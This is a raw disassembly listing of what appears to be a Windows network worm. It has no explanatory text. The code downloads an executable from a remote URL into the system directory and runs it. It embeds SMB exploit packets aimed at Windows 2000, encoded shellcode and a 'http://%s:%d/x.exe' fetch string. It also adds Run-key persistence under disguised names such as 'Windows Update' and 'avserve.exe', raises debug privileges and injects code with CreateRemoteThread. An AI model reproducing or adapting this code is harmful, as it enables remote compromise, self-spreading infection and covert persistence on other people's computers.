call sub_310022BD
lea eax, [ebp+var_84]
push eax
push 0
call sub_31002476
add esp, 1Ch
jmp short loc_3100267B
; ---------------------------------------------------------------------------
loc_3100261D: ; CODE XREF: sub_31002542+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_31001054 ; lstrcmpiA
test eax, eax
jnz short loc_31002666
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31002264
add esp, 14h
test eax, eax
jnz short loc_3100267B
push ebx
push edi
push esi
mov dword_31004FE0, 1
call sub_3100222F
add esp, 0Ch
jmp short loc_3100267B
; ---------------------------------------------------------------------------
loc_31002666: ; CODE XREF: sub_31002542+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31002476
pop ecx
pop ecx
loc_3100267B: ; CODE XREF: sub_31002542+1F�j
; sub_31002542+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31002542 endp
; =============== S U B R O U T I N E =======================================
sub_31002680 proc near ; CODE XREF: sub_31001C18+7A�p
; sub_310026A6+CA�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_3100104C ; VirtualAlloc
retn
sub_31002680 endp
; =============== S U B R O U T I N E =======================================
sub_31002694 proc near ; CODE XREF: sub_310026A6+10B�p
; sub_31002A44+E1�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31001048 ; VirtualFree
retn
sub_31002694 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310026A6 proc near ; CODE XREF: sub_31002928+102�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3100112C ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_310026D1
push 1
jmp loc_31002767
; ---------------------------------------------------------------------------
loc_310026D1: ; CODE XREF: sub_310026A6+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31001058 ; GetSystemDirectoryA
mov edi, dword_3100105C
lea eax, [ebp+var_110]
push offset asc_31004CAC ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_3100107C ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_310019D4
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_310010C8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31002747
push 2
jmp short loc_31002767
; ---------------------------------------------------------------------------
loc_31002747: ; CODE XREF: sub_310026A6+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31001128 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_3100276A
push [ebp+var_4]
call dword_31001098 ; CloseHandle
push 3
loc_31002767: ; CODE XREF: sub_310026A6+26�j
; sub_310026A6+9F�j
pop eax
jmp short loc_310027BB
; ---------------------------------------------------------------------------
loc_3100276A: ; CODE XREF: sub_310026A6+B4�j
mov edi, 100000h
push edi
call sub_31002680
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31001124 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31001044 ; WriteFile
push [ebp+var_4]
call dword_31001098 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31001A04
push ebx
call sub_31002694
add esp, 0Ch
xor eax, eax
loc_310027BB: ; CODE XREF: sub_310026A6+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_310026A6 endp
; =============== S U B R O U T I N E =======================================
sub_310027C0 proc near ; CODE XREF: sub_31002928+9D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_310027D7: ; CODE XREF: sub_310027C0+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_310027D7
pop edi
pop esi
pop ebx
retn
sub_310027C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100281C proc near ; CODE XREF: sub_310028A1+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_3100284F
add ebx, 1Ah
loc_3100284F: ; CODE XREF: sub_3100281C+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_310010EC
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31002879
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_3100289C
; ---------------------------------------------------------------------------
loc_31002879: ; CODE XREF: sub_3100281C+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; strchr
pop ecx
test eax, eax
pop ecx
jz short loc_31002899
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_3100289C
; ---------------------------------------------------------------------------
loc_31002899: ; CODE XREF: sub_3100281C+68�j
mov al, [ebp+arg_0]
loc_3100289C: ; CODE XREF: sub_3100281C+5B�j
; sub_3100281C+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_3100281C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310028A1 proc near ; CODE XREF: sub_31002928+8B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_310028FE
mov edi, [ebp+arg_0]
push ebx
loc_310028B6: ; CODE XREF: sub_310028A1+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_3100281C
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_310028E2
cmp bl, 7Ah
jg short loc_310028E2
movsx esi, bl
sub esi, 61h
loc_310028E2: ; CODE XREF: sub_310028A1+34�j
; sub_310028A1+39�j
cmp bl, 41h
jl short loc_310028F2
cmp bl, 5Ah
jg short loc_310028F2
movsx esi, bl
sub esi, 41h
loc_310028F2: ; CODE XREF: sub_310028A1+44�j
; sub_310028A1+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_310028B6
pop ebx
jmp short loc_31002901
; ---------------------------------------------------------------------------
loc_310028FE: ; CODE XREF: sub_310028A1+F�j
mov edi, [ebp+arg_0]
loc_31002901: ; CODE XREF: sub_310028A1+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_310028A1 endp
; =============== S U B R O U T I N E =======================================
sub_31002908 proc near ; CODE XREF: sub_31002928+A6�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_3100290C: ; CODE XREF: sub_31002908+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_3100290C
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31002908 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002928 proc near ; CODE XREF: sub_31002A44+DA�p
var_13C = byte ptr -13Ch
var_3C = byte ptr -3Ch
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset aZer0 ; "zer0"
mov [ebp+var_4], 1
push [ebp+arg_0]
call dword_310010F4 ; strstr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31002A3D
add edi, 4
jz loc_31002A3D
push edi
call dword_3100107C ; lstrlenA
cmp eax, 50h
jle loc_31002A3D
movsx eax, byte ptr [edi]
and byte ptr [edi+100h], 0
sub eax, 61h
mov [ebp+arg_0], eax
js loc_31002A3D
cmp eax, 1Ah
jge loc_31002A3D
inc edi
push 7Eh
push edi
call dword_310010EC ; strchr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz loc_31002A3D
push ebx
mov bl, [esi]
push [ebp+arg_0]
and byte ptr [esi], 0
lea eax, [ebp+var_13C]
push edi
push eax
call sub_310028A1
xor edi, edi
lea eax, [ebp+var_3C]
push edi
push eax
lea eax, [esi+2]
mov [esi], bl
push eax
call sub_310027C0
lea eax, [ebp+var_3C]
push eax
call sub_31002908
add esp, 1Ch
cmp [esi+1], al
pop ebx
jnz short loc_31002A3D
push 44h
lea eax, [ebp+var_C]
push offset dword_31004CB4
push eax
call sub_31001190
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_3C]
push 30h
push eax
lea eax, [ebp+var_13C]
push eax
call dword_3100107C ; lstrlenA
push eax
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_C]
push eax
call sub_310011FB
add esp, 18h
test eax, eax
jnz short loc_31002A33
cmp [ebp+arg_0], edi
jz short loc_31002A33
lea eax, [ebp+var_13C]
push eax
call sub_310026A6
pop ecx
mov [ebp+var_4], edi
loc_31002A33: ; CODE XREF: sub_31002928+F4�j
; sub_31002928+F9�j
lea eax, [ebp+var_C]
push eax
call sub_310011DF
pop ecx
loc_31002A3D: ; CODE XREF: sub_31002928+26�j
; sub_31002928+2F�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_31002928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31002A44 proc near ; CODE XREF: UPX0:31002B54�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31002680
pop ecx
mov edi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31001040 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_31002AAC
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31004FBC
push dword_31004FD4
push offset aDfashnzdsdl ; "dfashnzdsdl"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s?scn=%d?inf=%d"...
push eax
call dword_3100111C ; wsprintfA
add esp, 1Ch
jmp short loc_31002AC4
; ---------------------------------------------------------------------------
loc_31002AAC: ; CODE XREF: sub_31002A44+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
loc_31002AC4: ; CODE XREF: sub_31002A44+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_3100112C ; InternetOpenA
push ebx
push ebx
push ebx
lea ecx, [ebp+var_84]
push ebx
push ecx
push eax
mov [ebp+arg_0], eax
call dword_31001128 ; InternetOpenUrlA
lea ecx, [ebp+var_4]
mov esi, 2000h
push ecx
push esi
push edi
push eax
mov [ebp+arg_4], eax
call dword_31001124 ; InternetReadFile
loc_31002AFD: ; CODE XREF: sub_31002A44+D3�j
lea eax, [ebx+edi]
push 4
push eax
push offset aZer0_0 ; "zer0"
call sub_31002BD6 ; memcmp
add esp, 0Ch
test eax, eax
jz short loc_31002B1B
inc ebx
cmp ebx, esi
jl short loc_31002AFD
jmp short loc_31002B24
; ---------------------------------------------------------------------------
loc_31002B1B: ; CODE XREF: sub_31002A44+CE�j
add ebx, edi
push ebx
call sub_31002928
pop ecx
loc_31002B24: ; CODE XREF: sub_31002A44+D5�j
push edi
call sub_31002694
mov esi, dword_31001130
pop ecx
push [ebp+arg_4]
call esi ; InternetCloseHandle
push [ebp+arg_0]
call esi ; InternetCloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_31002A44 endp
; ---------------------------------------------------------------------------
loc_31002B40: ; DATA XREF: sub_31001E06+E9�o
push esi
loc_31002B41: ; CODE XREF: UPX0:31002B89�j
xor esi, esi
loc_31002B43: ; CODE XREF: UPX0:31002B87�j
inc esi
inc esi
mov al, byte_31004D34[esi+esi*4]
push eax
push off_31004D35[esi+esi*4]
call sub_31002A44
pop ecx
pop ecx
call dword_310010F8 ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31001AC9
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31001080 ; Sleep
cmp esi, 14h
jb short loc_31002B43
jmp short loc_31002B41
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002B8C proc near ; CODE XREF: sub_31001262+128�p
; sub_31001262+134�p ...
jmp dword_31001108
sub_31002B8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002B92 proc near ; CODE XREF: sub_31001262+9C�p
; sub_31001262+C5�p ...
jmp dword_31001104
sub_31002B92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002B98 proc near ; CODE XREF: sub_31001262+93�p
; sub_31001262+B2�p ...
jmp dword_31001100
sub_31002B98 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31002BA0 proc near ; CODE XREF: sub_31001262+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31002BC0
loc_31002BAC: ; CODE XREF: sub_31002BA0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31002BAC
loc_31002BC0: ; CODE XREF: sub_31002BA0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31002BA0 endp
; ---------------------------------------------------------------------------
align 10h
loc_31002BD0: ; DATA XREF: sub_31001E06+A�o
jmp dword ptr loc_310010F0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BD6 proc near ; CODE XREF: sub_31002A44+C4�p
jmp dword_310010E8
sub_31002BD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BDC proc near ; CODE XREF: sub_31002310+AB�p
jmp dword_31001074
sub_31002BDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BE2 proc near ; CODE XREF: sub_31002310+64�p
jmp dword_3100106C
sub_31002BE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31002BE8 proc near ; CODE XREF: sub_31002310+2D�p
jmp dword_31001068
sub_31002BE8 endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 504h dup(0)
byte_31004000 db 0EBh ; DATA XREF: sub_31001262+24E�o
; sub_31001262+260�o ...
db 58h
word_31004002 dw 7468h ; DATA XREF: sub_310020F4+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999AAh, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_310042C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31001262+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31004354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31004400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_310044E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31001262+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31004544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_310045B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31004654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_310046D4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31004768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_310047D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31001262+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31004848 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31004906 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31004940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31001262+41B�o
; sub_31001262+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_310049B8: ; DATA XREF: sub_31001262+44A�o
jmp short loc_310049C0
; ---------------------------------------------------------------------------
jmp short loc_310049C2
; ---------------------------------------------------------------------------
align 10h
loc_310049C0: ; CODE XREF: UPX0:loc_310049B8�j
; DATA XREF: sub_31001262+5C�o
pop esp
pop esp
loc_310049C2: ; CODE XREF: UPX0:310049BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_310049CC dd 1CEC8166h dword_310049D0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_310017C9+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_310017C9+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_310017C9+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_310017C9+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_310017C9+8�o
; sub_31001E06+BA�o
align 4
aUterm13 db 'uterm13',0 ; DATA XREF: sub_31001851:loc_31001936�o
; UPX0:31001DA5�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31001851+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31001851:loc_31001898�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31001851+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31001851+18�o
align 10h
dword_31004A80 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31001ADF+F9�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31001ADF+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31001ADF+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31001ADF+55�o
; sub_31002476+4B�o ...
align 4
aGet db 'GET',0 ; DATA XREF: sub_31001ADF+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31001D90�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_31001E06+C1�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31001E06+B3�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_31001E06+AC�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31001E06+9F�o
align 4
aU12 db 'u12',0 ; DATA XREF: sub_31001E06+8D�o
aU11 db 'u11',0 ; DATA XREF: sub_31001E06+81�o
aU10 db 'u10',0 ; DATA XREF: sub_31001E06+75�o
aU9 db 'u9',0 ; DATA XREF: sub_31001E06+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31001E06+5D�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_31001E06+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31001E06+45�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_31001E06+3B�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31001E06+22�o
align 10h
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_310020F4+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31001C18+23�o
; sub_310023C8+5F�o ...
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_31001C18+1C�o
; sub_31002476+87�o ...
align 4
aDfashnzdsdl db 'dfashnzdsdl',0 ; DATA XREF: sub_31002542+57�o
; sub_31002542+8A�o ...
dd 3 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31002542+32�o
aClient db 'Client',0 ; DATA XREF: sub_31002542+BC�o
; sub_31002542+F8�o
align 10h
aId db 'ID',0 ; DATA XREF: sub_31002542+37�o
; sub_31002542+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_310023C8+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_310023C8+47�o
align 10h
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_310023C8+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_310023C8+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_310023C8+32�o
